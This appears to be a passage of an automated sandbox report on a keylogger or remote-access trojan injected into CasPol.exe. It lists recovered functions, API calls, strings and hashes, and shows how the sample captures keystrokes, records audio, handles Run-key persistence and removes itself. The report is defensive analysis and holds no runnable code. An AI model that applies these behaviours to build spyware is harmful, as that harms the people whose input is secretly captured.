                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ACP$OCP
                                                                              • API String ID: 0-711371036
                                                                              • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                              • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                              • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                              • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                              Strings
                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LocalTime
                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                              • API String ID: 481472006-1507639952
                                                                              • Opcode ID: 56914ec683c0f854cfe337d66ad939822683803ad371fa52872332a087436636
                                                                              • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                              • Opcode Fuzzy Hash: 56914ec683c0f854cfe337d66ad939822683803ad371fa52872332a087436636
                                                                              • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LocalTime
                                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                                              • API String ID: 481472006-2430845779
                                                                              • Opcode ID: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
                                                                              • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                              • Opcode Fuzzy Hash: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
                                                                              • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                              APIs
                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExistsFilePath
                                                                              • String ID: alarm.wav$xIG
                                                                              • API String ID: 1174141254-4080756945
                                                                              • Opcode ID: 5e2cc61e5469dce6cd81fe38bc9b3898a15368567c28f87c540c39d025e7a3e9
                                                                              • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                              • Opcode Fuzzy Hash: 5e2cc61e5469dce6cd81fe38bc9b3898a15368567c28f87c540c39d025e7a3e9
                                                                              • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                              APIs
                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                              • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                              • String ID: Online Keylogger Stopped
                                                                              • API String ID: 1623830855-1496645233
                                                                              • Opcode ID: 319d7400761289b2542cd9082559967ddf1120e6fa0471cb6b6b4a5462119b43
                                                                              • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                              • Opcode Fuzzy Hash: 319d7400761289b2542cd9082559967ddf1120e6fa0471cb6b6b4a5462119b43
                                                                              • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                              APIs
                                                                              • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                              • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wave$BufferHeaderPrepare
                                                                              • String ID: T=G
                                                                              • API String ID: 2315374483-379896819
                                                                              • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                              • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                              • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                              • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                              APIs
                                                                              • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LocaleValid
                                                                              • String ID: IsValidLocaleName$j=D
                                                                              • API String ID: 1901932003-3128777819
                                                                              • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                              • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                              • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                              • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID: T=G$T=G
                                                                              • API String ID: 3519838083-3732185208
                                                                              • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                              • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                              • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                              • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                              APIs
                                                                              • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                              • String ID: [AltL]$[AltR]
                                                                              • API String ID: 2738857842-2658077756
                                                                              • Opcode ID: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
                                                                              • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                              • Opcode Fuzzy Hash: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
                                                                              • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00448825
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorFreeHeapLast_free
                                                                              • String ID: `@$`@
                                                                              • API String ID: 1353095263-20545824
                                                                              • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                              • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                              • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                              • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                              APIs
                                                                              • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: State
                                                                              • String ID: [CtrlL]$[CtrlR]
                                                                              • API String ID: 1649606143-2446555240
                                                                              • Opcode ID: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
                                                                              • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                              • Opcode Fuzzy Hash: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
                                                                              • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                              APIs
                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteOpenValue
                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                              • API String ID: 2654517830-1051519024
                                                                              • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                              • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                              • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                              • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteDirectoryFileRemove
                                                                              • String ID: pth_unenc
                                                                              • API String ID: 3325800564-4028850238
                                                                              • Opcode ID: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                                                                              • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                              • Opcode Fuzzy Hash: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                                                                              • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                              APIs
                                                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ObjectProcessSingleTerminateWait
                                                                              • String ID: pth_unenc
                                                                              • API String ID: 1872346434-4028850238
                                                                              • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                              • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                              • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                              • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                              • GetLastError.KERNEL32 ref: 0043FB02
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1717984340-0
                                                                              • Opcode ID: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                                                                              • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                              • Opcode Fuzzy Hash: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                                                                              • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759